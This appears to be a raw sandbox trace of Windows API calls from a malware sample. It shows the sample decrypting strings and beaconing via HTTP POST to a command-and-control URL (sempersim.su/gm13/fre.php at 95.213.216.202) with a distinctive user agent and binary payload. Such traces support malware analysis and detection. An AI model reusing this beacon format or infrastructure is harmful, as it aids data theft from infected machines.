dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0179.230] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644d68, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1344) returned 0x330 [0179.233] Sleep (dwMilliseconds=0xea60) [0179.284] GetProcessHeap () returned 0x620000 [0179.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643638 [0179.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0179.285] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0179.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0179.294] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0179.342] GetProcessHeap () returned 0x620000 [0179.342] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6390f8 [0179.343] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0179.343] CryptImportKey (in: hProv=0x63ba08, pbData=0x6390f8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0179.344] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0179.344] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0179.345] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0179.345] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0179.345] GetProcessHeap () returned 0x620000 [0179.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6390f8 | out: hHeap=0x620000) returned 1 [0179.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0179.347] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643638, pdwDataLen=0x19fcfc | out: pbData=0x643638, pdwDataLen=0x19fcfc) returned 1 [0179.348] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0179.348] CryptDestroyKey (hKey=0x62d710) returned 1 [0179.348] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0179.349] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0179.349] GetProcessHeap () returned 0x620000 [0179.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0179.349] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0179.350] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0179.350] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0179.351] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0179.351] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0179.352] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0179.352] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0179.353] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0179.353] GetProcessHeap () returned 0x620000 [0179.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0179.353] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0179.353] GetProcessHeap () returned 0x620000 [0179.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0179.353] GetProcessHeap () returned 0x620000 [0179.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0179.390] GetProcessHeap () returned 0x620000 [0179.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643638 | out: hHeap=0x620000) returned 1 [0179.390] GetProcessHeap () returned 0x620000 [0179.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6430e0 [0179.391] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0179.391] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0179.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0179.397] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0179.410] GetProcessHeap () returned 0x620000 [0179.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fa8 [0179.411] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0179.411] CryptImportKey (in: hProv=0x63bcb0, pbData=0x638fa8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0179.412] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0179.412] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0179.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0179.413] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0179.413] GetProcessHeap () returned 0x620000 [0179.414] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fa8 | out: hHeap=0x620000) returned 1 [0179.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0179.415] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6430e0, pdwDataLen=0x19fcfc | out: pbData=0x6430e0, pdwDataLen=0x19fcfc) returned 1 [0179.415] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0179.416] CryptDestroyKey (hKey=0x62d710) returned 1 [0179.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0179.420] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0179.420] GetProcessHeap () returned 0x620000 [0179.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0179.421] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0179.421] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0179.422] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0179.422] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0179.423] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0179.423] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0179.423] GetProcessHeap () returned 0x620000 [0179.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0179.423] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6447e8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb80*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0179.425] GetProcessHeap () returned 0x620000 [0179.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b680 [0179.425] socket (af=2, type=1, protocol=6) returned 0x334 [0179.425] connect (s=0x334, name=0x63eb80*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0179.479] FreeAddrInfoW (pAddrInfo=0x6447e8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb80*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0179.479] GetProcessHeap () returned 0x620000 [0179.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba90 [0179.479] GetProcessHeap () returned 0x620000 [0179.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644d68 [0179.480] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0179.481] wvsprintfA (in: param_1=0x644d68, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0179.481] GetProcessHeap () returned 0x620000 [0179.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0179.481] GetProcessHeap () returned 0x620000 [0179.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644d68 | out: hHeap=0x620000) returned 1 [0179.482] GetProcessHeap () returned 0x620000 [0179.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643098 [0179.482] GetProcessHeap () returned 0x620000 [0179.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644d68 [0179.482] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0179.483] wvsprintfA (in: param_1=0x644d68, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0179.483] GetProcessHeap () returned 0x620000 [0179.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0179.483] GetProcessHeap () returned 0x620000 [0179.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644d68 | out: hHeap=0x620000) returned 1 [0179.484] send (s=0x334, buf=0x63a880*, len=237, flags=0) returned 237 [0179.485] send (s=0x334, buf=0x6421e0*, len=159, flags=0) returned 159 [0179.485] GetProcessHeap () returned 0x620000 [0179.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644d68 [0179.485] recv (in: s=0x334, buf=0x644d68, len=4048, flags=0 | out: buf=0x644d68*) returned 237 [0181.088] GetProcessHeap () returned 0x620000 [0181.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0181.089] GetProcessHeap () returned 0x620000 [0181.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643098 | out: hHeap=0x620000) returned 1 [0181.089] GetProcessHeap () returned 0x620000 [0181.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0181.089] GetProcessHeap () returned 0x620000 [0181.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba90 | out: hHeap=0x620000) returned 1 [0181.090] closesocket (s=0x334) returned 0 [0181.092] GetProcessHeap () returned 0x620000 [0181.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b680 | out: hHeap=0x620000) returned 1 [0181.092] GetProcessHeap () returned 0x620000 [0181.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0181.093] GetProcessHeap () returned 0x620000 [0181.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6430e0 | out: hHeap=0x620000) returned 1 [0181.093] GetProcessHeap () returned 0x620000 [0181.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0181.093] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644d68, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x133c) returned 0x334 [0181.096] Sleep (dwMilliseconds=0xea60) [0181.104] GetProcessHeap () returned 0x620000 [0181.104] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643560 [0181.105] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0181.105] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0181.110] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0181.111] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0181.117] GetProcessHeap () returned 0x620000 [0181.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639098 [0181.118] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0181.118] CryptImportKey (in: hProv=0x63b7e8, pbData=0x639098*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0181.119] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0181.119] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0181.122] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0181.122] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0181.122] GetProcessHeap () returned 0x620000 [0181.122] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639098 | out: hHeap=0x620000) returned 1 [0181.123] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0181.123] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643560, pdwDataLen=0x19fcfc | out: pbData=0x643560, pdwDataLen=0x19fcfc) returned 1 [0181.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0181.124] CryptDestroyKey (hKey=0x62d710) returned 1 [0181.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0181.125] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0181.125] GetProcessHeap () returned 0x620000 [0181.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0181.125] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0181.126] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0181.126] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0181.127] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0181.127] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0181.127] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0181.128] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0181.128] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0181.128] GetProcessHeap () returned 0x620000 [0181.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0181.128] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0181.128] GetProcessHeap () returned 0x620000 [0181.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0181.129] GetProcessHeap () returned 0x620000 [0181.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0181.129] GetProcessHeap () returned 0x620000 [0181.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643560 | out: hHeap=0x620000) returned 1 [0181.129] GetProcessHeap () returned 0x620000 [0181.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6431b8 [0181.130] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0181.130] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0181.138] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0181.139] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0181.144] GetProcessHeap () returned 0x620000 [0181.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639038 [0181.145] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0181.145] CryptImportKey (in: hProv=0x63b7e8, pbData=0x639038*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0181.146] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0181.146] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0181.147] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0181.147] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0181.147] GetProcessHeap () returned 0x620000 [0181.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639038 | out: hHeap=0x620000) returned 1 [0181.148] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0181.148] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6431b8, pdwDataLen=0x19fcfc | out: pbData=0x6431b8, pdwDataLen=0x19fcfc) returned 1 [0181.149] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0181.149] CryptDestroyKey (hKey=0x62d190) returned 1 [0181.149] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0181.150] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0181.150] GetProcessHeap () returned 0x620000 [0181.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0181.150] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0181.150] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0181.152] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0181.154] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0181.154] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0181.155] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0181.155] GetProcessHeap () returned 0x620000 [0181.155] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633318 [0181.155] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x644770*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eac0*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0181.156] GetProcessHeap () returned 0x620000 [0181.156] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b540 [0181.156] socket (af=2, type=1, protocol=6) returned 0x338 [0181.156] connect (s=0x338, name=0x63eac0*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0181.204] FreeAddrInfoW (pAddrInfo=0x644770*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eac0*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0181.204] GetProcessHeap () returned 0x620000 [0181.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63bcb0 [0181.204] GetProcessHeap () returned 0x620000 [0181.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644d68 [0181.206] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0181.207] wvsprintfA (in: param_1=0x644d68, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0181.207] GetProcessHeap () returned 0x620000 [0181.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0181.207] GetProcessHeap () returned 0x620000 [0181.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644d68 | out: hHeap=0x620000) returned 1 [0181.208] GetProcessHeap () returned 0x620000 [0181.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643368 [0181.208] GetProcessHeap () returned 0x620000 [0181.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644d68 [0181.209] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0181.210] wvsprintfA (in: param_1=0x644d68, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0181.210] GetProcessHeap () returned 0x620000 [0181.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0181.210] GetProcessHeap () returned 0x620000 [0181.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644d68 | out: hHeap=0x620000) returned 1 [0181.211] send (s=0x338, buf=0x63a880*, len=237, flags=0) returned 237 [0181.212] send (s=0x338, buf=0x6421e0*, len=159, flags=0) returned 159 [0181.212] GetProcessHeap () returned 0x620000 [0181.212] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644d68 [0181.212] recv (in: s=0x338, buf=0x644d68, len=4048, flags=0 | out: buf=0x644d68*) returned 237 [0182.314] GetProcessHeap () returned 0x620000 [0182.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0182.315] GetProcessHeap () returned 0x620000 [0182.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643368 | out: hHeap=0x620000) returned 1 [0182.315] GetProcessHeap () returned 0x620000 [0182.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0182.316] GetProcessHeap () returned 0x620000 [0182.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63bcb0 | out: hHeap=0x620000) returned 1 [0182.316] closesocket (s=0x338) returned 0 [0182.317] GetProcessHeap () returned 0x620000 [0182.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b540 | out: hHeap=0x620000) returned 1 [0182.317] GetProcessHeap () returned 0x620000 [0182.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0182.317] GetProcessHeap () returned 0x620000 [0182.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6431b8 | out: hHeap=0x620000) returned 1 [0182.318] GetProcessHeap () returned 0x620000 [0182.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633318 | out: hHeap=0x620000) returned 1 [0182.318] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644d68, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x11f8) returned 0x338 [0182.320] Sleep (dwMilliseconds=0xea60) [0182.323] GetProcessHeap () returned 0x620000 [0182.323] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643248 [0182.324] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0182.324] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0182.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0182.330] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0182.372] GetProcessHeap () returned 0x620000 [0182.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0182.375] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0182.375] CryptImportKey (in: hProv=0x63b7e8, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0182.376] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0182.376] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0182.376] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0182.377] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 